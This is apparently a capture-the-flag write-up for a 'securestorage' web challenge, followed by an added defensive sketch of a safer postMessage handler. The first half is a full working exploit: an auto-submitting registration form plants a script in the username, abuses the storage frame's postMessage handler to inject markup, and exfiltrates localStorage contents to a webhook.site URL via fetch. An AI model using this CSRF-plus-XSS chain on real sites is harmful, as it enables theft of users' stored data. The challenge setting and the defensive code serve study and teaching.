Create a malicious page that registers a user with the following payload in the username. The payload first replaces document.body.innerHTML of the storage frame with:
<iframe id=frame src="/secure.js"></iframe><div id=site>https://securestorage.rars.win</div>
The additional div is necessary so that the check for site in the onmessage handler does not fail. The payload then sets the body of the new inner frame to:
<img src=x onerror="fetch(`https://webhook.site/0334edcb-76bd-414b-9caf-c5f304c121ce/${btoa(localStorage.message)}`)"/>
Final HTML page:
<html>
<body onload="loginform.submit()">
<form id="loginform" method="POST" action="https://securestorage.rars.win/api/register">
<input type="text" class="form-control" name="user" placeholder="Username"
value='5123<script>setTimeout(() => { storage = document.getElementById("secure_storage");storage.contentWindow.postMessage(["document.body.innerHTML", `<iframe id=frame src="/secure.js"></iframe><div id=site>https://securestorage.rars.win</div>`], storage.src);setTimeout(() => { storage.contentWindow.postMessage(["window.frame.contentWindow.document.body.innerHTML", "<img src=x onerror=\"fetch(`https://webhook.site/0334edcb-76bd-414b-9caf-c5f304c121ce/${btoa(localStorage.message)}`)\"/>"], storage.src); }, 500); }, 1000)</script>'>
<input type="password" class="form-control" name="pass" placeholder="Password" value='123123'>
<button type="submit" class="btn btn-primary mt-4">Login</button>
</form>
</body>
</html>
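A defensive counterpart to the handler this payload abuses, added here as an example and not taken from the writeup or the challenge code: it compares the sender against a constant instead of a `site` element in the DOM, and accepts named storage operations instead of a `[path, value]` pair. The function name, the `{op, key, value}` message format, the `ALLOWED_KEYS` set and the in-memory store are assumptions made for illustration.

```javascript
// Added defensive sketch; names and message format are assumptions, not the challenge's code.
const TRUSTED_ORIGIN = "https://securestorage.rars.win"; // constant, never read from the DOM
const ALLOWED_KEYS = new Set(["message"]);               // hypothetical storage keys

// store: any object with getItem/setItem (localStorage in a browser).
function handleStorageMessage(event, store) {
  // 1. event.origin is set by the browser; compare it to a constant, not to
  //    page content that a message or injected markup could rewrite.
  if (event.origin !== TRUSTED_ORIGIN) return { ok: false, reason: "origin" };

  // 2. Require a plain {op, key, value} object. An array such as
  //    ["document.body.innerHTML", "<...>"] is rejected outright.
  const msg = event.data;
  if (msg === null || typeof msg !== "object" || Array.isArray(msg)) {
    return { ok: false, reason: "shape" };
  }
  const { op, key, value } = msg;

  // 3. The key is checked against an allowlist and is never used as a
  //    property path, so no message can reach the DOM.
  if (typeof key !== "string" || !ALLOWED_KEYS.has(key)) {
    return { ok: false, reason: "key" };
  }

  if (op === "get") return { ok: true, value: store.getItem(key) };
  if (op === "set") {
    if (typeof value !== "string") return { ok: false, reason: "value" };
    store.setItem(key, value);
    return { ok: true };
  }
  return { ok: false, reason: "op" };
}

// Constructed in-memory stand-in for localStorage so the example runs offline.
function makeStore() {
  const m = new Map();
  return {
    getItem: (k) => (m.has(k) ? m.get(k) : null),
    setItem: (k, v) => { m.set(k, String(v)); },
  };
}
```

Because the script in the username runs on the registering site itself, the origin check alone would not stop this payload; the shape and key checks are what keep a message from writing markup into the frame, and the username still needs output encoding where it is rendered.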